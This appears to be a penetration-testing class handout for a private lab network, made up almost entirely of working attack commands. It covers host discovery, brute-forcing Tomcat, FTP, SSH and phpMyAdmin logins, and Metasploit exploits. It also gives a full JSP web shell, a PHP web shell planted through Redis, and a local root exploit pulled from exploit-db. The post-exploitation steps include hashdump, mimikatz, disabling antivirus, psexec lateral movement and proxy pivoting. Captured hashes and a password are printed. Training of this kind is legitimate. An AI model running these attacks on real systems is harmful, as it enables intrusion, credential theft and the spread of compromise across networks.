Untitled

########################################
# Advanced Pentester Night School      #
# By Joe McCray of Strategic Security  #
########################################


Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf

sudo nmap -sP 10.0.0.0/24
     infosecaddicts

sudo nmap -sL 10.0.0.0/24
     infosecaddicts


for i in `seq 1 255`; do ping -c1 10.0.0.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

./ipcrawl 10.0.0.1 10.0.0.254


wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

sudo cp propecia /bin
     infosecaddicts

propecia 10.0.0 22

propecia 10.0.0 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cd ~/toolz


#################################################
# Screenshotting the Web Servers in the Network #
#################################################
cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/


wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
cd wkhtmltox/bin/
sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386


cd ~/toolz/
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
     infosecaddicts

sudo nmap --script-updatedb
     infosecaddicts


cd ~/toolz/labscreenshots/
sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
     infosecaddicts


vi screenshots.sh

#!/bin/bash
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html


sh screenshots.sh


##########################
# Nmap NSE tricks to try #
##########################
sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
     infosecaddicts

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
     infosecaddicts


#########################
# Building a quick list #
#########################
cd ~
echo bob >> list.txt
echo jim >> list.txt
echo joe >> list.txt
echo tim >> list.txt
echo admin >> list.txt
echo hello >> list.txt
echo rob >> list.txt
echo test >> list.txt
echo aaaaaa >> list.txt
echo larry >> list.txt
echo mario >> list.txt
echo jason >> list.txt
echo john >> list.txt


##############
# Using Nmap #
##############
******** NOTE: Some of these scans may take up to an hour to run... ********
******** NOTE: Open them in another terminal window and keep going  ********

sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120 (long scan)

sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120

sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120

sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120 (long scan)

sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120


******** NOTE: Some of these scans may take up to an hour to run... ********
******** NOTE: Open them in another terminal window and keep going  ********


#########################
# Playing with Nmap NSE #
#########################

nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com

nmap -p80 --script dns-brute infosecaddicts.com

nmap --script http-robtex-reverse-ip secore.info

nmap -Pn -p80 --script=http-headers infosecaddicts.com


ls /usr/share/nmap/scripts | grep http
nmap -Pn -p80 --script=http-* infosecaddicts.com


#####################################
# Writing Your Own Nmap NSE Scripts #
#####################################


----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
-- The Rule Section --
portrule = function(host, port)
    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end

-- The Action Section --
action = function(host, port)
    return "February class bundle!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443


----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"

-- The Rule Section --
portrule = shortport.http


-- The Action Section --
action = function(host, port)
    return "February class bundle!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443


OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.

----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        return response.body
    end

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")

        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end

----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


******** Attacking Kevgir ********
I figured I've give you something fun to play with.


###############
# Using Nikto #
###############
cd ~/toolz/nikto-2.1.1

perl nikto.pl -update

perl nikto.pl -h 10.0.0.120

perl nikto.pl -h 10.0.0.120:8080

perl nikto.pl -h 10.0.0.120:8081

perl nikto.pl -h 10.0.0.120:9000


####################
# Using Metasploit #
####################
cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/http/http_version

set RHOSTS 10.0.0.120

set RPORT 8080

run


-------------------------------

use auxiliary/scanner/http/tomcat_enum

set RHOSTS 10.0.0.120

set RPORT 8080

run


####################
# Attacking Tomcat #
####################
cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/http/http_version

set RHOSTS 10.0.0.120

set RPORT 8080

run


use auxiliary/scanner/http/tomcat_mgr_login

set USERNAME tomcat

set USERPASS_FILE /home/infosecaddicts/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 10.0.0.120

set RPORT 8080

run


use exploit/multi/http/tomcat_mgr_upload

set USERNAME tomcat

set PASSWORD tomcat

set RHOST 10.0.0.120

set RPORT 8080

set PATH /manager/html

set PAYLOAD java/meterpreter/bind_tcp

exploit


run post/linux/gather/checkvm

run post/linux/gather/enum_configs

run post/linux/gather/enum_protections

run post/linux/gather/enum_system

run post/linux/gather/enum_users_history

run post/linux/gather/hashdump

shell

/bin/bash

id

uname -a

dpkg -l

cd /tmp

pwd


cat >> exploit.c << out

**************paste in the content from here *****************
https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...


gcc -o boom exploit.c

./boom

id


-------------------------------


hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html


-------------------------------------------index.jsp-------------------------------------------
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>
-------------------------------------------index.jsp-------------------------------------------

***** now pack the webshell *****


mkdir webshell
cp index.jsp webshell

cd webshell
jar -cvf ../webshell.war *


Deploy the WAR file using the built-in deploy option on the manager web-page.
Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
now upload the webshell.war. After uploading, visit page: http://10.0.0.120:8080/webshell/


****** This section isn't finished ******

cd ~/toolz/metasploit

./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war

jar tf ~/bind7777.war

****** This section isn't finished ******

Google is your friend hahahahahahahah........


#################
# Attacking FTP #
#################

sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120

cd ~/toolz/hydra

hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp

ftp
open 10.0.0.120
admin
admin
pwd
ls -lah

ls ../../


#################
# Attacking SSH #
#################
cd ~/toolz/hydra

hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh

ssh -p 1322 admin@10.0.0.120


cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/ssh/ssh_users

set USER_FILE /home/infosecaddicts/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 10.0.0.120

set RPORT 1322

run


use auxiliary/scanner/ssh/ssh_login

set USER_FILE /home/infosecaddicts/list.txt

set PASS_FILE /home/infosecaddicts/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 10.0.0.120

set RPORT 1322

run


sessions -l

sessions -u 1

sessions -i 1

id


########################
# Attacking phpMyAdmin #
########################
****** This section isn't finished ******

hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"

****** This section isn't finished ******

Google is your friend hahahahahahahah........


wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py

python pmabf.py http://10.0.0.120 root list.txt		(this gave me the WRONG password)


####################
# Attacking Joomla #
####################
cd ~/toolz/metasploit

./msfconsole

use use auxiliary/scanner/http/joomla_plugins

set RHOSTS 10.0.0.120

set RPORT 8080

run


****** This section isn't finished ******
Google is your friend hahahahahahahah........

#####################
# Attacking Jenkins #
#####################


****** This section isn't finished ******
Google is your friend hahahahahahahah........

#################
# Attacking NFS #
#################
rpcinfo -s 10.0.0.120

showmount -e 10.0.0.120

mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock

ls /tmp/nfs

cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
umount -l /tmp/nfs

sudo apt-cache search fcrackzip

sudo apt-get install -y fcrackzip

fcrackzip -D -p /home/infosecaddicts/list.txt

unzip -P aaaaaa backup.tar.bz2.zip

tar -zxvf backup.tar.bz2


###################
# Attacking Redis #
###################
sudo nmap -p 6379 --script=redis-info 10.0.0.120
	infosecaddicts

sudo apt-get install -y redis-tools
	infosecaddicts

redis-cli -h 10.0.0.120

CONFIG SET dir /var/www/html/main

CONFIG GET dir

config set dbfilename bomba.php

CONFIG GET dbfilename

SET cmd "<?php system($_GET['joe']); ?>"

BGSAVE

http://10.0.0.120/bomba.php

http://10.0.0.120/bomba.php?joe=id


(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"


****** This section isn't finished ******
Google is your friend hahahahahahahah........

cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/redis/file_upload

set RHOSTS 10.0.0.120

set LocalFile

****** This section isn't finished ******


####################################
# Finally, let's exploit something #
####################################

nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15

	https://www.exploit-db.com/search

	Search for:
	Savant httpd 3.1
	Apache httpd 2.0.58 ((Win32))


	Found one written in Python:
	https://www.exploit-db.com/exploits/18401/

	Found one for Savant 3.1 from Metasploit:
	https://www.exploit-db.com/exploits/16770/


cd ~/toolz/metasploit
./msfconsole
use exploit/windows/http/savant_31_overflow
set RHOST 10.0.0.15
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set RPORT 80
set LPORT 7777
exploit


********************************** Figure out who and where you are **********************************

meterpreter> sysinfo


meterpreter> getuid


meterpreter> ipconfig


meterpreter> run post/windows/gather/checkvm


meterpreter> run get_local_subnets


********************************** Escalate privileges and get hashes **********************************


meterpreter> use priv


meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav

meterpreter> run post/windows/gather/hashdump

	Got the following admin hash:
	Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter > load mimikatz

meterpreter > kerberos

	This should give me the administrative password:
	)K5?Jocb(Yx


********************************** Enumerate the host you are on **********************************

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(savant_31_overflow) > back

msf>


********************************** Lateral Movement *******************************


Now we can run the PSEXEC exploit.

-- Option 1:
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass )K5?Jocb(Yx

set RHOST 10.0.0.15

set payload windows/meterpreter/bind_tcp

set LPORT 2345

exploit

********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(psexec) >back

msf>

**********************************

-- Option 2:
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363

set payload windows/meterpreter/bind_tcp

set RHOST 10.0.0.15

set LPORT 5678

exploit


********************************** Set up your Pivot **********************************

meterpreter > background
                                                        <-- background the session
        You want to get back to this prompt:
        msf exploit(handler) > back                     <--- you need to get to main msf> prompt


        sessions -l                                     <--find a session you want to pivot through (note the IP and session number)

        Now set up Pivot with a route add
        ---------------------------------

route print												<--- should be blank

route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)


route print                                             <----- verify new route

******************************Scan through your Pivot ******************************

use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS 10.0.0.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack

set PORTS 445

run


####################################
# Socks Tunneling with Proxychains #
####################################
--- Open a duplicate putty session to your Ubuntu host

sudo apt-get install -y proxychains
    infosecaddicts

sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
     infosecaddicts

        Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
        socks4  127.0.0.1 1080

***************************Set up a Socks Proxy through your Pivot *************************


use auxiliary/server/socks4a

set SRVHOST 127.0.0.1

set SRVPORT 1080

run

        --- Go back to your other putty session with the meterpreter shell
cd ~

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24           <--- This is going to be really slow


        ---close the duplicate putty session to your Ubuntu host